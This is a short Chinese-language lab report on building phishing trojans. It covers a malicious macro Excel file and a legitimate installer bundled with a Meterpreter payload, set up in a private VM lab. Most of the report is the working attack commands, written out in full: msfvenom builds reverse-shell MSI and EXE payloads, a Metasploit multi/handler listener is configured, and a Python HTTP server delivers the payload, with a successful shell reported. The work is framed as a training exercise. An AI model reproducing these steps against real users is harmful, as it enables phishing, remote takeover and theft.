一、实验目的
学会制作简单的钓鱼样本并理解钓鱼样本木马的工作原理.
二、实验任务
1.制作恶意的excel文件
2.将正常的软件和恶意木马进行捆绑打包
三、实验环境
1、靶机地址:192.168.85.130
2、攻击机地址:192.168.85.128
四、实验过程和实验结果
msf生成恶意的msi文件
msfvenom -p windows/meterpreter/reverse_tcp lhsot=192.168.85.128 lport=10493 -f msi -o diaoyexl.msi
然后msf建立监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.85.128
set lport 10493
启动 msf 监听
然后python在具有恶意的msi的文件夹下开启http服务,启动msi传输
python3 -m http.server 80
当目标访问excel且启用宏功能时,如下获取shell
制作msf木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhsot=192.168.85.128 lport=10493 -f exe -o flash.exe
按照要求把木马flash.exe和正常的安装包进行压缩,制作好捆绑木马
在win7虚拟机中运行,可以在任务管理器中看到,flash.exe被执行
在kali中建立监听,成功连接
五、实验总结
本次实验,我们学习了社会工程学钓鱼样本的制作,学习到了制作钓鱼文件并通过kali连接钓鱼文件获取权限。在Windows系统中,我们通过制作宏定义多重表,宏表内部添加恶意代码,我们将该excel宏表隐藏为正常的表传递给靶机,接着连接恶意代码后门,成功获取权限。另一种是创建压缩包,解压压缩包会执行我们的恶意文件,我们通过文件也能够获取到恶意文件。